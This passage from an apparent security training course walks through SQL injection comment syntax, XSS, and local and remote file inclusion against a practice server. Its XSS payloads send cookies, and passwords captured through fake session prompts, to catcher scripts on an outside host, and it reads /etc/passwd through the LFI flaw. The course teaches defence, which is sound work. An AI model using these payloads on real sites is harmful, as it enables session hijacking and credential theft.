  1957. ------------------------------------------------------------------------------------- -------------------
  1958.  
  1959.  
  1960.  
  1961.  
  1962. Sometimes students ask about the "-- j" or "-- +" that I append to SQL injection attack string.
  1963.  
  1964. Here is a good reference for it:
  1965. https://www.symantec.com/connect/blogs/mysql-injection-comments-comments
  1966.  
  1967. Both attackers and penetration testers alike often forget that MySQL comments deviate from the standard ANSI SQL specification. The double-dash comment syntax was first supported in MySQL 3.23.3. However, in MySQL a double-dash comment "requires the second dash to be followed by at least one whitespace or control character (such as a space, tab, newline, and so on)." This double-dash comment syntax deviation is intended to prevent complications that might arise from the subtraction of negative numbers within SQL queries. Therefore, the classic SQL injection exploit string will not work against backend MySQL databases because the double-dash will be immediately followed by a terminating single quote appended by the web application. However, in most cases a trailing space needs to be appended to the classic SQL exploit string. For the sake of clarity we'll append a trailing space and either a "+" or a letter.
  1968.  
  1969.  
  1970. ###############################################################################
  1971. # What is XSS #
  1972. # https://s3.amazonaws.com/infosecaddictsfiles/2-Intro_To_XSS.pptx #
  1973. ###############################################################################
  1974.  
  1975. OK - what is Cross Site Scripting (XSS)
  1976.  
  1977. 1. Use Firefox to browse to the following location:
  1978. ---------------------------Paste this into Firefox-----------------------------------
  1979. http://45.63.104.73/xss_practice/
  1980. -------------------------------------------------------------------------------------
  1981.  
  1982. A really simple search page that is vulnerable should come up.
  1983.  
  1984.  
  1985.  
  1986.  
  1987. 2. In the search box type:
  1988. ---------------------------Paste this into Firefox-----------------------------------
  1989. <script>alert('So this is XSS')</script>
  1990. -------------------------------------------------------------------------------------
  1991.  
  1992.  
  1993. This should pop-up an alert window with your message in it proving XSS is in fact possible.
  1994. Ok, click OK and then click back and go back to http://45.63.104.73/xss_practice/
  1995.  
  1996.  
  1997. 3. In the search box type:
  1998. ---------------------------Paste this into Firefox-----------------------------------
  1999. <script>alert(document.cookie)</script>
  2000. -------------------------------------------------------------------------------------
  2001.  
  2002.  
  2003. This should pop-up an alert window with your message in it proving XSS is in fact possible and your cookie can be accessed.
  2004. Ok, click OK and then click back and go back to http://45.63.104.73/xss_practice/
  2005.  
  2006. 4. Now replace that alert script with:
  2007. ---------------------------Paste this into Firefox-----------------------------------
  2008. <script>document.location="http://45.63.104.73/xss_practice/cookie_catcher.php?c="+document.cookie</script>
  2009. -------------------------------------------------------------------------------------
  2010.  
  2011. This will actually pass your cookie to the cookie catcher that we have sitting on the webserver.
  2012.  
  2013.  
  2014. 5. Now view the stolen cookie at:
  2015. ---------------------------Paste this into Firefox-----------------------------------
  2016. http://45.63.104.73/xss_practice/cookie_stealer_logs.html
  2017. -------------------------------------------------------------------------------------
  2018.  
  2019. The cookie catcher writes to this file and all we have to do is make sure that it has permissions to be written to.
  2020.  
  2021.  
  2022.  
  2023.  
  2024.  
  2025.  
  2026. ############################
  2027. # A Better Way To Demo XSS #
  2028. ############################
  2029.  
  2030.  
  2031. Let's take this to the next level. We can modify this attack to include some username/password collection. Paste all of this into the search box.
  2032.  
  2033.  
  2034. Use Firefox to browse to the following location:
  2035. ---------------------------Paste this into Firefox-----------------------------------
  2036. http://45.63.104.73/xss_practice/
  2037. -------------------------------------------------------------------------------------
  2038.  
  2039.  
  2040. Paste this in the search box
  2041. ----------------------------
  2042.  
  2043.  
  2044. Option 1
  2045. --------
  2046. ---------------------------Paste this into Firefox-----------------------------------
  2047. <script>
  2048. password=prompt('Your session is expired. Please enter your password to continue',' ');
  2049. document.write("<img src=\"http://45.63.104.73/xss_practice/passwordgrabber.php?password=" +password+"\">");
  2050. </script>
  2051. -------------------------------------------------------------------------------------
  2052.  
  2053. Now view the stolen cookie at:
  2054. ---------------------------Paste this into Firefox-----------------------------------
  2055. http://45.63.104.73/xss_practice/passwords.html
  2056. -------------------------------------------------------------------------------------
  2057.  
  2058.  
  2059. Option 2
  2060. --------
  2061. -------------------------Paste this into Firefox-----------------------------------
  2062. <script>
  2063. username=prompt('Please enter your username',' ');
  2064. password=prompt('Please enter your password',' ');
  2065. document.write("<img src=\"http://45.63.104.73/xss_practice/unpw_catcher.php?username="+username+"&password="+password+"\">");
  2066. </script>
  2067. -------------------------------------------------------------------------------------
  2068.  
  2069.  
  2070.  
  2071. Now view the stolen cookie at:
  2072. http://45.63.104.73/xss_practice/username_password_logs.html
  2073.  
  2074.  
  2075.  
  2076.  
  2077. #########################################
  2078. # Let's try a local file include (LFI) #
  2079. #########################################
  2080. - Here is an example of an LFI
  2081. - Open this page in Firefox:
  2082. -------------------------Paste this into Firefox-----------------------------------
  2083. http://45.63.104.73/showfile.php?filename=contactus.txt
  2084. -------------------------------------------------------------------------------------
  2085.  
  2086.  
  2087. - Notice the page name (showfile.php) and the parameter name (filename) and the filename (contactus.txt)
  2088. - Here you see a direct reference to a file on the local filesystem of the victim machine.
  2089. - You can attack this by doing the following:
  2090. -------------------------Paste this into Firefox-----------------------------------
  2091. http://45.63.104.73/showfile.php?filename=/etc/passwd
  2092. -------------------------------------------------------------------------------------
  2093.  
  2094.  
  2095. - This is an example of a Local File Include (LFI), to change this attack into a Remote File Include (RFI) you need some content from
  2096. - somewhere else on the Internet. Here is an example of a text file on the web:
  2097. -------------------------Paste this into Firefox-----------------------------------
  2098. http://www.opensource.apple.com/source/SpamAssassin/SpamAssassin-127.2/SpamAssassin/t/data/etc/hello.txt
  2099. -------------------------------------------------------------------------------------
  2100.  
  2101. - Now we can attack the target via RFI like this:
  2102. -------------------------Paste this into Firefox-----------------------------------
  2103. http://45.63.104.73/showfile.php?filename=http://www.opensource.apple.com/source/SpamAssassin/SpamAssassin-127.2/SpamAssassin/t/data/etc/hello.txt
  2104. -------------------------------------------------------------------------------------
  2105.  
  2106.  
  2107.  
  2108.  
  2109. ####################
  2110. # Day 5 Challenges #
  2111. ####################
  2112. Challenge 1: Analyze this malware
  2113. https://s3.amazonaws.com/infosecaddictsfiles/malware-password-is-infected.zip
  2114. - Is it network aware
  2115. - Does it modify the registry
  2116. - Is it packed with a malware packer
  2117. - Improve the script am.py from earlier in this pastebin so that it more effectively analyzes this file.
  2118. - Improve the script mal_to_db.py earlier in this pastebin so that it more effectively stores data from the am.py analysis of this file.
  2119.  
  2120. Challenge 2: Analyze and debug this exploit (answer the questions in this enclosed text file)
  2121. https://s3.amazonaws.com/infosecaddictsfiles/SLmail5-5-quiz.zip
  2122.  
  2123. Challenge 3: Perform a security assessment on this website
  2124. http://demo.testfire.net
  2125. username: jsmith
  2126. password: Demo1234
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement